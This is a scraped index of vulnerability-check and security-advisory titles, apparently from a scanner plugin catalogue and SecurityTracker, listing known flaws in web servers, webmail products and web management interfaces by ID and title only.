[100394] Savant Web Server Remote Buffer Overflow Vulnerability [100378] iWeb Server URL Directory Traversal Vulnerability [100346] HP Power Manager Management Web Server Login Remote Code Execution Vulnerability [100332] Serv-U Web Client HTTP Request Remote Buffer Overflow Vulnerability [100318] Cherokee Web Server Malformed Packet Remote Denial of Service Vulnerability [100314] AfterLogic WebMail Pro Multiple Cross Site Scripting Vulnerabilities [100313] AfterLogic WebMail Pro Detection [100301] JDownloader Web Detection [100300] Thin Webserver Detection [100287] Mozilla Bugzilla 'Bug.create()' WebService Function SQL Injection Vulnerability [100286] Mozilla Bugzilla 'Bug.search()' WebService Function SQL Injection Vulnerability [100275] nginx WebDAV Multiple Directory Traversal Vulnerabilities [100257] NaviCOPA Web Server Remote Buffer Overflow and Source Code Information Disclosure Vulnerabilities [100247] Deonix Web Templates Management Index.PHP SQL Injection Vulnerability [100242] CommuniGate Pro Web Mail URI Parsing HTML Injection Vulnerability [100225] Webmedia Explorer Multiple Cross Site Scripting Vulnerabilities [100224] Webmedia Explorer Detection [100220] phpWebThings 'module' Parameter Local File Include Vulnerability [100219] phpWebThings Detection [100199] Zervit Webserver multiple vulnerabilities [100195] Realty Web-Base 'admin/admin.php' Multiple SQL Injection Vulnerabilities [100194] Realty Web-Base Detection [100193] TinyWebGallery/QuiXplorer Local File Include Vulnerability [100192] TinyWebGallery Detection [100184] WebCalendar Detection [100176] Axigen Web Detection [100172] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability [100171] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability [100137] WebFileExplorer 'body.asp' SQL Injection Vulnerability [100136] WebFileExplorer Detection [100103] webEdition CMS 'WE_LANGUAGE' Parameter Local File Include Vulnerability [100045] WEBJump! Multiple SQL Injection Vulnerabilities [80094] WEBalbum Local File Include Vulnerability [80078] phpWebThings editor_insert_bottom Parameter Remote File Include Vulnerability [80069] Kerio WebMail v5 multiple flaws [80056] ELOG Web LogBook global Denial of Service [80055] Easy File Sharing Web Server Information Disclosure [80046] Webroot SpySweeper Enterprise Check [80030] Packeteer PacketShaper Web Denial of Service [80027] NetScaler web management XSS [80025] NetScaler web management login [80023] NetScaler web management cookie information [80022] NetScaler web management cookie cipher weakness [80021] WebCalendar User Account Enumeration Disclosure Issue [80020] Symantec Web Security flaws [80019] Symantec Web Security Detection [72613] FreeBSD Ports: webmin [71848] FreeBSD Ports: icedtea-web [71385] FreeBSD Ports: WebCalendar-devel [70727] FreeBSD Ports: WebCalendar [69325] Debian Security Advisory DSA 2188-1 (webkit) [69112] Debian Security Advisory DSA 2177-1 (pywebdav) [68950] FreeBSD Ports: webkit-gtk2 [68823] FreeBSD Ports: webkit-gtk2 [68513] FreeBSD Ports: webkit-gtk2 [67992] FreeBSD Ports: webkit-gtk2 [67711] FreeBSD Ports: webkit-gtk2 [66148] Gentoo Security Advisory GLSA 200911-01 (horde horde-webmail horde-groupware) [65836] SLES10: Security update for Websphere Community Edition [65766] SLES10: Security update for Websphere Community Edition [65685] SLES11: Security update for Websphere Community Edition [65296] SLES9: Security update for webdav apache module [64983] Ubuntu USN-836-1 (webkit) [64396] Fedora Core 11 FEDORA-2009-6166 (webkitgtk) [63700] FreeBSD Ports: pivot-weblog [63683] Debian Security Advisory DSA 1752-1 (webcit) [63571] Debian Security Advisory DSA 1725-1 (websvn) [63551] Gentoo Security Advisory GLSA 200903-20 (websvn) [63358] FreeBSD Ports: websvn [63312] FreeBSD Ports: ganglia-monitor-core, ganglia-monitor-webfrontend [60293] Debian Security Advisory DSA 1486-1 (gnatsweb) [60055] FreeBSD Ports: ganglia-webfrontend [58866] FreeBSD Ports: WebCalendar [58845] FreeBSD Ports: webmin [58458] Gentoo Security Advisory GLSA 200707-05 (webmin/usermin) [58331] Debian Security Advisory DSA 1279-1 (webcalendar) [58319] Debian Security Advisory DSA 1267-1 (webcalendar) [57861] Gentoo Security Advisory GLSA 200608-11 (webmin/usermin) [57540] Debian Security Advisory DSA 1199-1 (webmin) [57067] FreeBSD Ports: webmin [56974] FreeBSD Ports: WebCalendar [56955] Debian Security Advisory DSA 1096-1 (webcalendar) [56745] Debian Security Advisory DSA 1056-1 (webcalendar) [56689] Gentoo Security Advisory GLSA 200605-04 (phpwebsite) [56643] FreeBSD Ports: phpwebftp [56410] Debian Security Advisory DSA 1002-1 (webcalendar) [56333] Gentoo Security Advisory GLSA 200602-14 (noweb) [56316] FreeBSD Ports: WebCalendar [56274] Debian Security Advisory DSA 968-1 (noweb) [55975] Gentoo Security Advisory GLSA 200512-02 (webmin usermin) [55637] FreeBSD Ports: webcalendar [55435] Gentoo Security Advisory GLSA 200509-17 (Webmin Usermin) [55209] Debian Security Advisory DSA 799-1 (webcalendar) [55198] Gentoo Security Advisory GLSA 200508-21 (phpwebsite) [54983] Gentoo Security Advisory GLSA 200507-07 (phpwebsite) [54965] Gentoo Security Advisory GLSA 200506-13 (webapp-config) [54869] Gentoo Security Advisory GLSA 200503-04 (phpwebsite) [54844] Gentoo Security Advisory GLSA 200502-12 (Webmin) [54756] Gentoo Security Advisory GLSA 200411-35 (phpwebsite) [54597] Gentoo Security Advisory GLSA 200406-12 (webmin) [54447] Debian Security Advisory DSA 766-1 (webcalendar) [53676] Debian Security Advisory DSA 392-1 (webfs) [53617] Debian Security Advisory DSA 328-1 (webfs) [53612] Debian Security Advisory DSA 323-1 (noweb) [53608] Debian Security Advisory DSA 319-1 (webmin) [53538] Debian Security Advisory DSA 712-1 (geneweb) [53303] Debian Security Advisory DSA 223-1 (geneweb) [53234] Debian Security Advisory DSA 544-1 (webmin) [53217] Debian Security Advisory DSA 526-1 (webmin) [52436] FreeBSD Ports: openwebmail [52391] FreeBSD Ports: webmin [52127] FreeBSD Ports: kdewebdev [20170] phpWebThings forum Parameter SQL Injection Vulnerabilities [20108] Fingerprint web server with favicon.ico [20014] WebGUI < 6.7.6 arbitrary command execution [19946] WebWasher < 4.4.1 Build 1613 Multiple Vulnerabilities [19689] Embedded Web Server Detection [19305] Community Link Pro webeditor login.cgi remote command execution [18586] webadmin.php detection [18478] WebHints remote command execution flaw [18424] MiniShare webserver buffer overflow [18376] Athena Web Registration remote command execution flaw [18366] Several GET locks web server [18364] Sambar Server Administrative Interface multiple XSS [18292] WebAPP Apage.CGI remote command execution flaw [18213] RSA Security RSA Authentication Agent For Web XSS [18212] 4D WebStar Tomcat Plugin Remote Buffer Overflow flaw [18192] YusASP Web Asset Manager Vulnerability [18177] Websense reporting console detection [17636] Outlook Web Access URL Injection [17343] phpWebLog Cross Site Scripting [17304] Default web account on Zyxel [16463] Open WebMail Logindomain Parameter Cross-Site Scripting Vulnerability [16168] WebLibs File Disclosure [15752] WebCalendar SQL Injection [15716] Nortel Web Management Default Username and Password (ro/ro) [15529] Open WebMail userstat.pl Arbitrary Command Execution [14718] Cisco bug ID CSCdu35577 (Web Check) [14379] Multiple Vulnerabilities in Merak Webmail / IceWarp Web Mail [14254] Vulnerability in Exchange Server 5.5 Outlook Web Access XSS (842436) [14249] Opera web browser news url denial of service vulnerability [14248] Opera web browser large javaScript array handling vulnerability [14247] Opera web browser file download extension spoofing [14245] Opera web browser address bar spoofing weakness (2) [14244] Opera web browser address bar spoofing weakness [14241] 4D WebStar Symbolic Link Vulnerability [14221] Open WebMail Detection [14181] Mozilla/Firefox user interface spoofing [12637] Open WebMail vacation.pl Arbitrary Command Execution [12295] Dell OpenManage Web Server <= 3.7.1 [12262] Open WebMail Content-Type XSS [12233] eMule Plus Web Server detection [12074] Talentsoft Web+ reveals install path [12049] Default Novonyx Web Server Files [12048] Netware Web Server Sample Page Source Disclosure [12043] BEA WebLogic Operator/Admin Password Disclosure Vulnerability [11980] Compaq Web SSI DoS [11939] foxweb CGI [11927] TelCondex Simple Webserver Buffer Overflow [11894] TinyWeb 1.9 [11879] Compaq Web-based Management Login [11808] Microsoft RPC Interface Buffer Overrun (823980) [11771] webadmin.dll detection [11732] Webnews.exe vulnerability [11724] WebLogic source code disclosure [11722] cgiWebupdate.exe vulnerability [11707] Bugbear.B web backdoor [11556] CISCO Secure ACS Management Interface Login Overflow [11546] Xeneo web server %A DoS [11545] Xeneo Web Server 2.2.9.0 DoS [11544] MonkeyWeb POST with too much data [11518] Checkpoint Firewall open Web adminstration [11486] WebLogic management servlet [11182] DB4Web directory traversal [11181] WebSphere Host header overflow [11180] DB4Web TCP relay [11167] Webserver4everyone too long URL [11166] KF Web Server /%00 bug [11162] WebSphere Edge caching proxy denial of service [11151] Webserver 4D Cleartext Passwords [11131] Sambar web server DOS [11095] webcart.cgi [11089] Webseal denial of service [11085] Personal Web Sharing overflow [11079] Snapstream PVS web directory traversal [11072] Basilix Webmail Dummy Request Vulnerability [11063] LabView web server DoS [11047] Jigsaw webserver MS/DOS device DoS [11037] WEB-INF folder accessible [11015] Xerver web server DOS [11005] LocalWeb2000 remote read [10967] Shambala web server DoS [10963] Compaq Web Based Management Agent Proxy Vulnerability [10962] Cabletron Web View Administrative Access [10849] Oracle 9iAS DAD Admin interface [10816] Webalizer Cross Site Scripting Vulnerability [10815] Web Server Cross Site Scripting [10793] Cobalt Web Administration Server Detection [10791] Ultraseek Web Server Detect [10789] Novell Groupwise WebAcc Information Disclosure [10781] Outlook Web anonymous access [10775] E-Shopping Cart Arbitrary Command Execution (WebDiscount) [10773] MacOS X Finder reveals contents of Apache Web files [10756] MacOS X Finder reveals contents of Apache Web directories [10748] Mediahouse Statistics Web Server Detect [10744] VisualRoute Web Server Detection [10743] Tripwire for Webpages Detection [10741] SiteScope Web Administration Server Detection [10740] SiteScope Web Managegment Server Detect [10739] Novell Web Server NDS Tree Browsing [10738] Oracle Web Administration Server Detection [10732] IIS 5.0 WebDav Memory Leakage [10715] BEA WebLogic Scripts Server scripts Source Disclosure [10711] Sambar webserver pagecount hole [10698] WebLogic Server /%00/ bug [10697] WebLogic Server DoS [10676] CheckPoint Firewall-1 Web Authentication Detection [10662] Web mirroring [10616] webspirs.cgi [10573] IIS 5.0 Sample App reveals physical path of web root [10533] Web Shopper remote file retrieval [10532] eXtropia Web Store remote file retrieval [10402] CVSWeb detection [10385] ht://Dig's htsearch reveals web server path [10373] TalentSoft Web+ version detection [10355] vqServer web traversal vulnerability [10302] robot(s).txt exists on the Web Server SecurityTracker - https://www.securitytracker.com: [1028856] Splunk Web Interface Permits Remote Clickjacking Attacks [1028853] Cisco Wide Area Application Services Web Interface Bug Lets Remote Authenticated Users Execute Arbitrary Commands [1028852] Cisco Application and Content Networking System Web Interface Bug Lets Remote Authenticated Users Execute Arbitrary Commands [1027926] Polycom HDX Series Input Validation Flaw in Web Management Interface Permits Cross-Site Scripting Attacks [1027785] Splunk Input Validation Flaws in Splunk Web Interface Permits Cross-Site Scripting Attacks [1027285] SMC SMC8024L2 Switch Web Interface Discloses Configuration Data to Remote Users [1025088] Cisco Security Agent Web Management Interface Bug Lets Remote Users Execute Arbitrary Code [1024844] Citrix Web Interface Input Validation Hole Permits Cross-Site Scripting Attacks [1024122] CUPS Web Interface Permits Cross-Site Request Forgery Attacks [1023370] IBM Rational ClearQuest Web Interface May Disclose Passwords in Certain Cases [1023069] Websense Email Security Input Validation Flaws in Administrative Interface Permis Cross-Site Scripting Attacks [1022605] Cisco Wireless LAN Controller SSH and Web Interface Bugs Let Remote Users Deny Service [1022596] DD-WRT Web Interface Bug Lets Remote Users Execute Arbitrary Code [1022403] NETGEAR DG632 Router Web Interface Can Be Crashed By Remote Users [1022237] Nortel Contact Center Administration Lets Remote Users Bypass Authentication to Access the Web Interface [1022145] Citrix Web Interface Input Validation Hole Permits Cross-Site Scripting Attacks [1021227] Safari WebKit Plug-in Interface Lets Remote Users Launch Local Applications [1021110] Citrix Web Interface Session Disconnect Bug Lets Local Users Gain Elevated Privileges [1020807] 3Com Wireless 8760 Access Point Web Interface Processing Bug Lets Remote Users Service [1020784] DreamBox Web Interface Can Be Crashed By Remote Users Requesting a Long URL [1020359] Novell GroupWise Input Validation Hole in the WebAccess Simple Interface Permits Cross-Site Scripting Attacks [1020266] uTorrent Web User Interface Can Be Crashed By Remote Users [1020265] BitTorrent Web User Interface Can Be Crashed By Remote Users [1019132] Citrix Web Interface Input Validation Hole in Online Help Permits Cross-Site Scripting Attacks [1018554] cgis.biz WebCart Input Validation Hole in Management Interface Permits Cross-Site Scripting Attacks [1017113] Sun Java System/iPlanet Messaging Server Webmail Interface Lets Remote Users Execute Javascript on the Target User's System [1016578] SpeedStream Web Administration Interface Lets Remote Users Deny Service [1016462] Juniper DX Application Acceleration Platform Input Validation Hole in Web Interface Permits Cross-Site Scripting Attacks [1016155] PunkBuster Buffer Overflow in WebTool Interface Lets Remote Users Deny Service [1015787] BorderWare MXtreme Vulnerability in Web Administration Interface Has Unspecified Impact [1015722] LISTSERV Web Archive Interface Unspecified Bugs Let Remote Users Execute Arbitrary Code [1015688] Thomson Speed Touch 500 Series Web Interface Input Validation Hole Permits Cross-Site Scripting Attacks [1015250] PowerChute Network Shutdown Uses a Non-Secure Web Interface [1014885] Sawmill Input Validation Error in Web Administration Interface Permits Cross-Site Scripting Attacks [1014605] BusinessObjects Enterprise Unspecified Flaw in Web Interface Lets Remote Users Deny Service [1014604] Crystal Reports Server Unspecified Flaw in Web Interface Lets Remote Users Deny Service [1014474] Darwin Streaming Server Web Admin Interface Lets Remote Users Deny Service [1013322] Mitel 3300 ICP PBX Web Interface Session Limits Let Remote Authenticated Users Deny Service [1013321] Mitel 3300 ICP PBX Predictable Session IDs on the Web Interface Let Remote Users Hijack Sessions [1011379] Pinnacle ShowCenter Web Interface Can Be Damaged By Remote Users [1011157] WhatsUp Gold Web Interface May Let Remote Users Cause Denial of Service Conditions [1010743] Lexmark Printer Web Interface Can Be Crashed By Remote Users Sending Long HOST Header Values [1010068] SurgeLDAP Web Administration Interface Authentication Flaw Lets Remote Users Gain Access [1009620] ImgSvr Web Interface Discloses Directory Listings and Files to Remote Users [1008806] webcamXP Web Interface Input Validation Flaw Permits Cross-Site Scripting Attacks [1007342] Cisco IOS Web Interface Buffer Overflow Lets Remote Users Send 2GB HTTP GET Requests to Execute Arbitrary Code [1007293] HP Color LaserJet Web Interface Permits Remote Cross-Site Scripting Attacks [1007196] ASUS ADSL Router Web Interface Discloses Passwords to Remote Users [1007046] VisNetic MailServer Web Mail Interface Discloses PHP Source Code to Remote Users [1006854] Axis Network Camera Web Interface Authentication Flaw Yields Root Access to Remote Users [1006337] NETGEAR FVS318 VPN Firewall Can Be Crashed Via the Web Browser Interface [1006091] Abyss Web Server Permits Brute Force Password Guessing on the Administrative Interface [1006074] Ericsson ADSL Modem Web Management Interface Grants Access to Any Remote User [1005369] Oracle 9i Application Server Web Cache Administration Interface Can Be Crashed By Remote Users [1005367] ArGoSoft Mail Server Web Interface Input Filtering Bug Lets Remote Users Steal E-mail Passwords [1004997] Citrix MetaFrame Running on Windows NT4 Terminal Server Can Be Crashed By a Remote User via the Java ICA Web Terminal Interface [1004867] Lucent Access Point Routers Can Be Crashed By Remote Users Sending a Large HTTP GET Request to the Web Management Interface [1004866] Brother NC-3100h Print Server Can Be Crashed By Remote Users Sending a Large Password to the Web Interface [1004857] SEH IC-9 Pocket Print Server Can Be Crashed By Remote Users Sending a Large Password to the Web Interface [1004328] ViewCVS Web-based CVS Interface Allows Cross-Site Scripting Attacks Against ViewCVS Users [1004275] Critical Path inJoin Directory Server 'iCon' Web Administration Interface Discloses Files on the System to Authenticated Remote Users [1002258] WinWrapper Professional Firewall Software Discloses Arbitrary Files to Remote Users via the Remote Web Management Interface [1002131] HP JetDirect Print Servers Fail to Set an Administrator Password for the Telnet Interface When the Administrator Sets Passwords Via the Web Interface [1001855] Gnatsweb GNU Bug Tracking System Lets Remote Users Retrieve Files from the Server and Execute Commands on the Server via the Web Interface [1001065] Cisco's Aironet Wireless Bridge Allows Display and Modification Via Web Even When the Web Interface Is Disabled [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service [1028879] Cisco Unified Communications Manager Web Page Flaw Permits Cross-Site Request Forgery Attacks [1028877] Cisco Unified Communications Manager User Web Dialer Flaw Permits Cross-Site Request Forgery Attacks [1028876] Cisco WebEx Meeting Center Discloses Potentially Sensitive Information to Remote Users [1028875] Cisco WebEx Meetings Server Status Verification Flaw Lets Remote Authenticated Users Access the System After Deactivation [1028851] Cisco Wide Area Application Services Web Service Framework Bug Lets Remote Users Execute Arbitrary Code [1028847] IBM WebSphere Commerce Web Services Flaw Lets Remote Users Hijack Sessions [1028846] IBM WebSphere Commerce REST Services Session Management Flaw Lets Remote Users Hijack Sessions [1028836] Symantec Web Gateway Bugs Permit Cross-Site Scripting, Cross-Site Request Forgery, Command Injection, and SQL Injection Attacks [1028831] Cisco ASA Input Validation Flaw in WebVPN Portal Login Page Permits Cross-Site Scripting Attacks [1028821] Samsung PS50C7700 TV Web Server Processing Flaw Lets Remote Users Deny Service [1028726] IBM WebSphere MQ Buffer Overflow in MQ Control Commands Lets Local Users Gain Elevated Privileges [1028724] (HP Issues Fix for HP-UX) Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks [1028708] Cisco IronPort AsyncOS Software for Cisco Web Security Appliance Bugs Let Remote Users Deny Service and Remote Authenticated Users Execute Arbtitrary Commands [1028695] Cisco WebEx Social Flaw Permits Cross-Site Request Forgery Attacks [1028686] IBM WebSphere Commerce Oracle Padding Attack Against 'krypto' Parameter Lets Certain Remote Users Obtain Potentially Sensitive Information [1028672] Siemens SIMATIC WinCC Web Navigator Bugs Let Remote Users Inject SQL Commands and Login to the System [1028634] FileMaker Pro Input Validation Flaw in 'Instant Web Publish' Permits Cross-Site Scripting Attacks [1028633] Cisco WebEx Meetings Server Discloses Event Passwords and Host Keys to Remote Users [1028619] IBM WebSphere Portal Server Input Validation Flaw in Web Content Viewer Portlet Permits Cross-Site Scripting Attacks [1028605] Splunk Web Input Validation Flaw Permits Cross-Site Scripting Attacks [1028602] IBM WebSphere Portal Input Validation Flaw Permits HTTP Response Splitting Attacks [1028595] IBM WebSphere DataPower SOA Appliance Input Validation Flaw Permits Cross-Site Scripting Attacks [1028592] Cisco WebEx for iOS Certificate Validation Flaw Lets Remote Users Spoof the Server [1028575] Apple iTunes WebKit Memory Corruption Flaws Let Remote Users Execute Arbitrary Code [1028566] WebEx Social Input Validation Flaws Permit Remote Authenticated Script Injection and Data Modification Attacks [1028539] RSA Authentication Agent for Web Input Validation Flaw Permits Cross-Site Scripting Attacks [1028537] Cisco Unified Presence Web Framework Bug Lets Remote Users Deny Service [1028513] Cisco Webex Meetings Server Bug Lets Remote Users View Files in the Cache Directory [1028505] IBM Classic Sametime Meetings Server Input Validation Flaw in Web Application Permits Cross-Site Scripting Attacks [1028454] Novell GroupWise WebAccess Input Validation Flaw in 'OnError' Attribute Permits Cross-Site Scripting Attacks [1028411] Microsoft Office Web Apps Input Validation Flaw in Sanitization Component Permits Cross-Site Scripting Attacks [1028386] Sophos Web Protection Appliance Bugs Let Remote Users View Files and COnduct Cross-Site Scripting Attacks and Remote Authenticated Users Execute Arbitrary Commands [1028375] IBM InfoSphere Replication Server Dashboard Web Server Discloses File and Directory Listings to Remote Authenticated Users [1028371] Splunk Web Input Validation Flaw Permits Cross-Site Scripting Attacks [1028334] IBM Tivoli Endpoint Manager Input Validation Hole in Web Reports Permits Cross-Site Scripting Attacks [1028333] IBM Rational ClearQuest Input Validation Hole in Web Client Permits Cross-Site Scripting Attacks [1028267] IBM WebSphere DataPower SOA Appliance TLS/DTLS CBC Mode Oracle Padding Lets Remote Users Recover Plaintext [1028266] Google Chrome WebKit Type Confusion Error Lets Remote Users Execute Arbitrary Code [1028245] IBM WebSphere Commerce Web Services Flaw Lets Remote Users Deny Service [1028154] Cisco Secure Access Control System Command Line Interface Flaw Lets Local Users Gain Root Privileges [1028153] Cisco Prime LAN Management Solution Command Line Interface Flaw Lets Local Users Gain Root Privileges [1028152] Cisco Identity Services Engine Software Command Line Interface Flaw Lets Local Users Gain Root Privileges [1028151] Cisco Application Networking Manager Command Line Interface Flaw Lets Local Users Gain Root Privileges [1028095] Cisco NAC Appliance Input Validation Flaw in Web Authentication Function Permits Cross-Site Scripting Attacks [1028038] Barracuda Web Filter SSH Backdoor Lets Remote Users Access the System [1028037] Barracuda Web Application Firewall SSH Backdoor Lets Remote Users Access the System [1028016] WebEx Training Center Input Validation Flaw Permits Cross-Site Request Forgery Attacks [1028014] WebEx Training Center Lets Remote Authenticated Users Delete Reservations Without Proper Permissions [1028013] WebEx Training Center Lets Remote Authenticated Users Enable/Disable Recordings Without Proper Permissions [1027919] Novell iPrint Unspecified 'op-client-interface-version' Flaw Lets Remote Users Execute Arbitrary Code [1027889] IBM Rational ClearQuest Input Validation Hole in Web Server Permits Cross-Site Scripting Attacks [1027888] IBM Rational ClearQuest Input Validation Flaw in Web Client Lets Remote Users Inject SQL Commands [1027868] Citrix XenApp XML Service Interface Bug Lets Remote Users Execute Arbitrary Code [1027830] Google Chrome Heap Overflow in WebGL Lets Remote Users Execute Arbitrary Code [1027798] IBM WebSphere DataPower XC10 Appliance Bugs Let Remote Authenticated Users Gain Elevated Privileges and Remote Users Deny Service [1027783] Adobe InDesign Server SOAP Interface Lets Remote Users Execute Arbitrary Commands [1027738] IcedTea-Web Heap Overflow in IcedTeaScriptableJavaObject Lets Remote Users Execute Arbitrary Code [1027722] Webmin Input Validation Hole in Real Name Field Permits Cross-Site Scripting Attacks [1027713] Cisco Unified MeetingPlace Web Conferencing Bugs Let Remote Users Inject SQL Commands and Deny Service [1027690] IBM Tivoli Monitoring Web Server HTTP TRACE/TRACK Support Lets Remote Users Obtain Potentially Sensitive Information [1027639] Cisco WebEx Player Buffer Overflows Let Remote Users Execute Arbitrary Code [1027615] Novell GroupWise WebAccess Input Validation Flaw in 'merge' Parameter Permits Cross-Site Scripting Attacks [1027614] Novell GroupWise WebAccess Input Validation Flaw in HTML Email Permits Cross-Site Scripting Attacks [1027525] Apple iTunes WebKit Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1027523] IceWarp Web Mail Discloses phpinfo() Details to Remote Users [1027507] Webmin Flaws Let Remote Authenticated Users Execute Arbitrary Code and View Arbitrary Files [1027500] Barracuda Web Filter Input Validation Flaws Permit Cross-Site Scripting Attacks [1027462] IBM WebSphere Application Server Lets Remote Authenticated Users Gain Elevated Privileges [1027443] McAfee Email and Web Security Lets Remote Users Bypass Authentication and Conduct Cross-Site Scripting Attacks [1027421] Apache Web Server Bugs Permit Cross-Site Scripting and Information Disclosure Attacks [1027406] SAP NetWeaver SOAP Interface Lets Remote Users Execute Arbitrary Commands [1027373] IBM WebSphere MQ File Transfer Edition Bug Permits Cross-Site Requeset Forgery Attacks [1027372] IBM WebSphere MQ File Transfer Edition Bug Lets Remote Authenticated Users Access Other File Transfers [1027358] Symantec Web Gateway Input Validation Flaw Lets Remote Users Inject SQL Commands [1027355] Cisco ASA SIP and WebVPN Bugs Let Remote Users Deny Service [1027349] Cisco Catalyst Switch Local Web Authentication Bug Lets Remote Authenticated Users Deny Service [1027306] IBM WebSphere MQ Bug Lets Remote Users Access the Queue Manager [1027289] Symantec Web Gateway Input Validation Flaws Lets Remote Users Inject SQL Commands, Execute Arbitrary Commands, and Change User Passwords [1027276] Sun ONE/iPlanet Web Server Bug Lets Remote Users Cause Partial Denial of Service Conditions [1027258] Mozilla Seamonkey Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks [1027257] Mozilla Thunderbird Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks [1027256] Mozilla Firefox Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks [1027223] Microsoft IIS Web Server Discloses Potentially Sensitive Information to Remote Users [1027217] Novell GroupWise WebAccess Directory Traversal Flaw Lets Remote Users View Files [1027212] Cisco WebEx Player Buffer Overflows and Memory Corruption Errors Let Remote Users Execute Arbitrary Code [1027186] Juniper Mobility System Software Input Validation Flaw in WebAAA Portal Permits Cross-Site Scripting Attacks [1027138] HP Web Jetadmin Input Validation Hole Permits Cross-Site Scripting Attacks [1027134] IBM WebSphere Sensor Events Input Validation Flaws Permit Cross-Site Scripting Attacks [1027078] Symantec Web Gateway Bugs Let Remote Users View/Upload/Delete Files, Execute Arbitrary Commands, and Conduct Cross-Site Scripting Attacks [1027053] Apple Safari WebKit Flaw Lets Remote Users Fill Out Form Inputs on a Target Web Page for a Target User [1027025] Symantec Web Gateway Input Validation Hole in 'spywall/timer.php' Permits Cross-Site Scripting Attacks [1026999] IBM WebSphere Application Server 'plugin-key.kdb' Password Expiration Date Lets Remote Users Conduct Spoofing Attacks [1026973] Mozilla Thunderbird Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks [1026972] Mozilla Seamonkey Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks [1026971] Mozilla Firefox Multiple Bugs Let Remote Users Execute Arbitrary Code, Spoof Web Sites, Obtain Information, and Conduct Cross-Site Scripting Attacks [1026966] WebCalendar Access Control and File Inclusion Bugs Let Remote Users Potentially Execute Arbitrary Code [1026961] Asterisk Manager Interface Lets Remote Authenticated Users Execute Shell Commands [1026951] Oracle iPlanet Web Server Admin Console Flaw Lets Remote Users Partially Access and Modify Data and Partially Deny Service [1026888] Cisco WebEx Player Buffer Overflows Let Remote Users Execute Arbitrary Code [1026880] IBM Tivoli Directory Server Input Validation Flaw in Web Admin Tool Permits Cross-Site Scripting Attacks [1026825] Webglimpse 'query' Parameter Validation Flaw Lets Remote Users Inject Operating System Commands [1026806] McAfee Email and Web Security Appliance Lets Remote Users Conduct Cross-Site Scripting Attacks and Remote Authenticated Users Gain Elevated Privileges [1026773] Barracuda Web Application Firewall Input Validation Hole in 'filter' Parameter Permits Cross-Site Scripting Attacks [1026769] Blackberry PlayBook Unspecified WebKit Bug Lets Remote Users Execute Arbitrary Code [1026768] Blackberry OS Unspecified WebKit Bug Lets Remote Users Execute Arbitrary Code [1026767] Google Android Unspecified WebKit Bug Lets Remote Users Execute Arbitrary Code [1026704] IBM WebSphere DataPower Lets Remote Users Decrypt SSL/TLS Traffic [1026695] Citrix XenServer Multiple Flaws in Web Self Service Have Unspecified Impact [1026693] Lenovo ThinkManagement Console SOAP Interface Lets Remote Users Upload and Delete Files and Execute Arbitrary Code [1026525] EMC SourceOne Web Search Lets Local Users Obtain Passwords [1026522] IBM WebSphere Application Server for z/OS Input Validation Flaw in Web Messaging Permits Cross-Site Scripting Attacks [1026521] IBM WebSphere Application Server Unspecified Flaw Has Unspecified Impact [1026486] @Mail WebMail Input Validation Flaws Permit Script Injection Attacks [1026481] IBM Web Experience Factory Input Validation Flaw Permits Cross-Site Scripting Attacks [1026457] Websense Products Have Multiple Flaws That Let Remote Users Execute Commands, Access the System, and Conduct Cross-Site Scripting Attacks [1026438] WebSVN Input Validation Flaw in getLog() Permits Cross-Site Scripting Attacks [1026329] IBM WebSphere MQ Lets Local Users Gain Elevated Privileges [1026304] IcedTea-Web Lets Remote Users Bypass Cross-Origin Restrictions [1026295] Apache Tomcat Lets Untrusted Web Applications Gain Elevated Privileges [1026252] Trend Micro InterScan Web Security Lets Local Users Gain Elevated Privileges [1026244] Cisco WebEx Player Buffer Overflows Let Remote Users Execute Arbitrary Code [1026222] Sun GlassFish Enterprise Server Web Container Bug Lets Remote Users Deny Service [1026199] phpMyAdmin Input Validation Flaw in Setup Interface Permits Cross-Site Scripting Attacks [1026170] IBM WebSphere ILOG Rule Team Server Input Validation Flaw Permits Cross-Site Scripting Attacks [1026099] IBM WebSphere Application Server Administative Console Permits Cross-Site Request Forgery Attacks [1026074] IBM WebSphere Commerce Edition Input Validation Holes Permit Cross-Site Scripting Attacks [1026063] SAP NetWeaver 'com.sap.ipc.webapp.ipcpricing' Application May Disclose Potentially Sensitive Information [1026058] JBoss Web Services Native DTD Recursive Processing Error Lets Remote Users Deny Service [1026055] SAP Web Application Server Flaws Permits Denial of Service, Cross-Site Scripting, and Shortcut Creation Attacks [1025998] IBM WebSphere Application Server Community Edition Tomact Webdav Servlet Bug Has Unspecified Impact [1025992] IBM WebSphere Application Server Discloses Restricted Files to Remote Users [1025972] Cisco Unified Presence Open Query Interface Lets Remote Users Obtain Database Contents [1025971] Cisco Unified Communications Manager Open Query Interface Lets Remote Users Obtain Database Contents [1025917] HP webOS Calendar Application Lets Remote Users Execute Arbitrary HTML/JavaScript Code [1025916] HP webOS Contacts Application Lets Remote Users Execute Arbitrary HTML/JavaScript Code [1025897] Windows Remote Desktop Web Access Validation Flaw Permits Cross-Site Scripting Attacks [1025854] IcedTea-Web Bugs Let Remote Users Determine the Home Directory Path and Manipulate the Security Warning Dialog [1025852] Samba Web Administration Tool (SWAT) Input Validation Flaws Permit Cross-Site Request Forgery and Cross-Site Scripting Attacks [1025846] CA ARCserve D2D RPC Interface Lets Remote Users Bypass Access Controls [1025831] Apple Laptop Battery Interface Lets Local Users Deny Service [1025804] Sun GlassFish Server Administrative Interface Flaws Let Remote Users Partially Access and Modify Data [1025753] Symantec Web Gateway Input Validation Flaw in 'forget.php' Lets Remote Users Inject SQL Commands [1025698] IBM Rational Team Concert Input Validation Flaw in User Interface Permits Cross-Site Scripting Attacks [1025683] IBM Security Network IPS Web Application Firewall Can Be Bypassed By Remote Users 